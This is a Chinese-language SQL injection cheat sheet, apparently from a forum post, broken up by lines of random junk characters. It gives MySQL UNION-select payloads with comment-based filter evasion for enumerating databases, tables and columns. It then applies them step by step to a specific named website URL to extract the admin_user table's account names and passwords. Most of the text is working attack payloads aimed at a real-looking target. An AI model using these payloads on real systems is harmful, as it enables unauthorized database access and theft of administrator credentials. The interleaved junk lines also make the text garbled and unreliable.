查库' R I4 ~9 t0 `7 K- w" o$ d
; p8 A% X A/ l! d# z0 [id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
' q8 a q5 x8 e9 A
) J- U' c, u. W. o7 B查表
/ \' V: Z+ L6 H$ ]( N- H1 ?8 I. {8 n7 q+ h# b& k
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
2 l% @. S4 Y8 \8 n1 m- y" \1 x/ ~! D3 K4 m
查段
, O5 y5 V* Z+ K3 h8 E1 v/ `8 p5 ]
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
( L9 x9 T5 ]% R' M- f- l8 B9 l
' R/ a' M) p7 `' r6 [ h2 T3 | C
mysql5高级注入方法暴表
! {' B7 P- E. f- ^8 n: x1 T
+ }7 Y3 ^$ D( [2 r5 l例子如下:2 k# R- w& \! [! ^1 ?
! n0 k0 Z5 y8 G$ P
1.爆表
/ K. j! Z: Y/ ^2 [: u2 k jhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
# z% X; U0 n' ? v" F z这样爆到第4个时出现了admin_user表。
# a- V- [6 x# H4 W) G5 }* e; j: M" f& w+ Q
2.暴字段
/ s. Z* \5 P" L; M- xhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
+ U/ M4 l+ m$ m& t. A) B- V% s
- \2 x7 ~4 Y4 H/ _
( J/ c: W8 Q- d$ m3.爆密码
( Y5 g- ~# M& H0 w2 C( |0 bhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* + j# m8 S# ^" a7 z6 ]
$ ]! S3 t6 F: d% E% N" G' c
8 }# K1 A7 O1 \' Q1 f |